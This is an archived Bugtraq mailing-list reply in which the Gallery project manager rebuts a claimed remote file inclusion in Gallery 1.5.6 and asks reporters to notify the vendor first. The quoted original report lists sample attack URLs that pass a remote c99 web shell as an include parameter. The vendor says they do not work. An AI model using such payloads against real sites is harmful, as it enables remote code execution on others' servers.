Re: gallery >> 1.5.6 Remote File Inclusion

To: s433d_only_linux@xxxxxxxx
Subject: Re: gallery >> 1.5.6 Remote File Inclusion
From: Chris Kelly <ckdake@xxxxxxxxxx>
Date: Tue, 24 Apr 2007 13:34:13 -0400
Cc: bugtraq@xxxxxxxxxxxxxxxxx, Gallery Project Core Team discussion list <gallery-core@xxxxxxxxxxxxxxxxxxxxx>
In-reply-to: <20070424152538.18736.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20070424152538.18736.qmail@xxxxxxxxxxxxxxxxx>

Did you actually try any of these so called "explots"?

As someone else pointed out, these aren't actually exploits.content.php is all functions and doesn't do anything when accesseddirectly, and there are explicit globals checks for all of theexamples you give. If you actually bothered to try any of them (orlook in the source code) you would see blank pages or messages such as


"Direct Access to this location is not allowed."

Also, it is appreciated if you contact the vendor first instead ofpublishing something to a disclosure mailing list. The address forthis is easy to find and is:


security@xxxxxxxxxxxxxxxxxxx

Please do your research next time, and if you actually find asecurity problem, let us know so that we can release a patch for itand credit you on our website with the release announcement. thanks!


-Chris
Gallery Project Manager

--
Chris Kelly
ckdake@xxxxxxxxxx
http://ckdake.com/


On Apr 24, 2007, at 11:25 AM, s433d_only_linux@xxxxxxxx wrote:

#######################################################################################################################################gallery >> 1.5.6 Remote FileInclusion##Affected Software : gallery >>1.5.6##Download..: http://sourceforge.net/project/downloading.php?group_id=7130&use_mirror=heanet&filename=gallery-1.5.6.tar.gz&66134343##Risk ..............:high##Date .........:24/4/2007##Found by ..........: s433d_only_linux(Dr.Linux)##Contact ...........:s433d_only_linux@xxxxxxxx##Web .............:Www.hackerz.ir#######################################################################################################################################
#Affected File:
gallery/lib/content.php
gallery/lib/content.php
gallery/lib/content.php
gallery/lib/content.php
gallery/setup/frame_test.php
gallery/contrib/joomla/admin.gallery.php
gallery/contrib/joomla/toolbar.gallery.php
gallery/contrib/mambo/admin.gallery.php
gallery/contrib/mambo/toolbar.gallery.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpnuke/modules.php.
gallery/contrib/phpnuke/modules.php.patch
########################################################################################################################################
# Exploit:
http://[target]/gallery/lib/content.php?include=http://shellseit/c99.txt?cmd=ls
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
gallery/lib/content.php?require=http://shell/c99.txt?cmd=ls
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
gallery/contrib/mambo/admin.gallery.php?require_once=http://shell/c99.txt?cmd=lsgallery/contrib/mambo/toolbar.gallery.php?require_once=http://shell/c99.txt?cmd=ls
#
#
#######################################################################################################################################

References:
- gallery >> 1.5.6 Remote File Inclusion
  - From: s433d_only_linux

Prev by Date: Security Advisory: CA CleverPath SQL Injection
Next by Date: [security bulletin] HPSBST02200 SSRT071330 rev.1 - HP StorageWorks Command View Advanced Edition for XP, Local Unauthorized Access
Previous by thread: gallery >> 1.5.6 Remote File Inclusion
Next by thread: Re: gallery >> 1.5.6 Remote File Inclusion
Index(es):
- Date
- Thread